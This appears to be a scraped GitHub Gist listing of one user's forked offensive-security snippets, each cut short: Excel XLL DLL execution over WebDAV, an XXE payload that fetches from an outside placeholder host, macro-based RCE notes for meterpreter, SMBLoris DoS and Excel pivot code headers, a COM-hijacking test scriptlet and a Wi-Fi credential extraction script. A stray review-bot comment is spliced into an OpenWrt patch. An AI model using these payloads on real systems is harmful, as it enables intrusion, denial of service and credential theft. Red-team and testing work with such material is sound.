@minkione
minkione / ExcelXLL.md
Created July 31, 2017 11:25 — forked from ryhanson/ExcelXLL.md
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local; it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, note that the DLL is still written to disk, but the dropped file is not the one loaded into the process. This is the case for any file downloaded via WebDAV; such files are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in, which is essentially a specially crafted DLL with specific exports. More info on XLLs can be found on MSDN.

The XLL can also be executed by double-clicking the .xll file; however, there is a security warning. @rxwx has more notes on this here inc

minkione / EQgroup.md
Created August 14, 2017 10:10 — forked from bontchev/EQgroup.md
Curated list of links describing the leaked Equation Group tools for Windows

Links describing the leaked EQ Group tools for Windows

Repositories and ports

Installation and usage guides

minkione / XXE_payloads
Created August 16, 2017 08:28 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
minkione / Dockerfile
Created August 17, 2017 06:24 — forked from staaldraad/Dockerfile
Use Docker to run @sensepost Mana like a hipster
# Mana-toolkit from @sensepost
#
# VERSION 0.1
FROM ubuntu
MAINTAINER Etienne Stalmans, [email protected]
RUN apt-get update && apt-get install -y \
unzip \
minkione / GL-iNet
Created August 17, 2017 07:12 — forked from cj1324/GL-iNet
GL-iNet OpenWrt Patch base attitude_adjustment, http://www.gl-inet.com/
Index: target/linux/ar71xx/files/arch/mips/ath79/mach-tl-wr703n.c
===================================================================
--- target/linux/ar71xx/files/arch/mips/ath79/mach-tl-wr703n.c (revision 38494)
+++ target/linux/ar71xx/files/arch/mips/ath79/mach-tl-wr703n.c (working copy)
@@ -21,7 +21,9 @@
#include "dev-wmac.h"
#include "machtypes.h"
-#define TL_WR703N_GPIO_LED_SYSTEM 27
+#define TL_WR703N_GPIO_LED_SYSTEM 13
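Review bot: redefining TL_WR703N_GPIO_LED_SYSTEM in place (27 to 13) in mach-tl-wr703n.c changes the system LED pin for every build that uses the TL-WR703N machine file, not only for the GL-iNet board this patch is described as targeting. Consider a separate machine file or a board-specific constant so the TL-WR703N value stays at 27. The hunk header (-21,7 +21,9) also indicates two net added lines that are not visible in this excerpt, so they cannot be reviewed here.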
minkione / Various-Macro-Based-RCEs.md
Created August 25, 2017 13:41 — forked from mgeeky/Various-Macro-Based-RCEs.md
Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.

This is a note for myself describing various Visual Basic macro construction techniques that could be used for remote code execution via a malicious document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glance before setting up a payload.

All of the examples below were generated using 192.168.56.101 as the remote address.

List:

  1. Page substitution macro for luring the user to click Enable Content
  2. The Unicorn Powershell based payload
minkione / smbloris.c
Created September 6, 2017 09:23 — forked from marcan/smbloris.c
SMBLoris attack proof of concept
/* SMBLoris attack proof-of-concept
*
* Copyright 2017 Hector Martin "marcan" <[email protected]>
*
* Licensed under the terms of the 2-clause BSD license.
*
* This is a proof of concept of a publicly disclosed vulnerability.
* Please do not go around randomly DoSing people with it.
*
* Tips: do not use your local IP as source, or if you do, use iptables to block
function Invoke-ExcelMacroPivot{
<#
.AUTHOR
Matt Nelson (@enigma0x3)
.SYNOPSIS
Pivots to a remote host by using an Excel macro and Excel's COM object
.PARAMETER Target
Remote host to pivot to
.PARAMETER RemoteDocumentPath
Local path on the remote host where the payload resides
minkione / AtomicRedTeam.sct
Created October 2, 2017 07:52
Sample COM Hijacking Atomic Red Team Test
<?XML version="1.0"?>
<scriptlet>
<registration
description="AtomicRedTeam"
progid="AtomicRedTeam"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
minkione / Extract-WiFi-Creds.ps1
Created October 3, 2017 10:32 — forked from gfoss/Extract-WiFi-Creds.ps1
Simple script to extract locally-stored Wi-Fi Credentials
#====================================#
# Extract Wi-Fi Credentials #
# greg . foss @ owasp . org #
# v0.1 -- July, 2017 #
#====================================#
# Licensed under the MIT License
<#